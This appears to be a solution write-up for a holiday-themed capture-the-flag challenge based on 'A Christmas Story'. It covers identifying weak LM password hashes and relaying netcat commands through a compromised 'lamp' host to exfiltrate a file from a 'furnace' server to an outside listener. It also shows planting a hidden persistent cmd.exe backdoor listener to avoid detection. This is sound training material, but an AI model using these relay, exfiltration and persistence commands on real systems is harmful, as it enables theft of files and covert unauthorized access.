1) What is interesting about the files that Ralphie could see on the lamp server?

He has access to a netcat executable (nc) on a Linux system!  What could be more interesting?  Well, the chimney file is a pipe file, likely used by the email command processing system or to issue commands to the Lamp directly.  But we don't need to mess with the Lamp.

2) What is the significance of the Annie cyphertext?

The Annie cyphertext is Windows LM password hashes.  These are trivial to crack with a multitude of tools, especially since they are seven characters max - you can tell this by the telltale "AAD3B435B51404EE" pattern, which indicates a seven character or less password (LM hashes are split into two hashes, seven characters each.  The telltale pattern equals a blank password, hence the seven characters or less password for each password hash).

The hashes decrypt to:

"DRINK MORE OVALTINE BUY COUNTER HACK RELOADE USE NETCAT RELAY"

Which is what our hero intends to do.

3) What command could Ralphie e-mail to the lamp to get access to the command shell on the furnace server from the kid's network to read the Christmas list?  What should Ralphie do on his own laptop for this to work?  Assume that you cannot alter the configuration of the lamp or get any higher privileges on that machine, nor can you reconfigure the firewall.

On his own laptop, run the following netcat command to setup a listener on port 443:

nc -l -p 443

Email the following command to the lamp:

echo "nc 10.11.11.11 443 < c:\christmas_gift_list.txt" | ./nc 10.10.10.10 2222

Since port 443 outbound is allowed through the firewall, this should send the Christmas Gift List to his laptop directly.

4) How can Ralphie make the activities you describe above less likely to be detected by his Old Man?

Since the netcat on the Furnace was started with a single listener "-l" rather than a persistent listener "-L", the Old Man will be very suspicious when he finds that his listener on the Furnace is no longer, er, listening.  To get around this, Ralphie could issue this command via email to the lamp first instead:

echo "nc -L -p 2223 -d -e cmd.exe" | ./nc 10.10.10.10 2222

This should start a detached, persistent listener on the Furnace on port 2223.  After that runs, the listener on 2222 should die (-l vs. -L).

Then, send the following command to extract the Christmas Gift List:

echo "nc 10.11.11.11 443 < c:\christmas_gift_list.txt" | ./nc 10.10.10.10 2223

After he gets the list, Ralphie can send this command to restart the single-use listener on 2222:

echo "nc -l -p 2222 -e cmd.exe" | ./nc 10.10.10.10 2223

Aside from not creating suspicion in the Old Man, Ralphie now has his own persistent listener on the Furnace.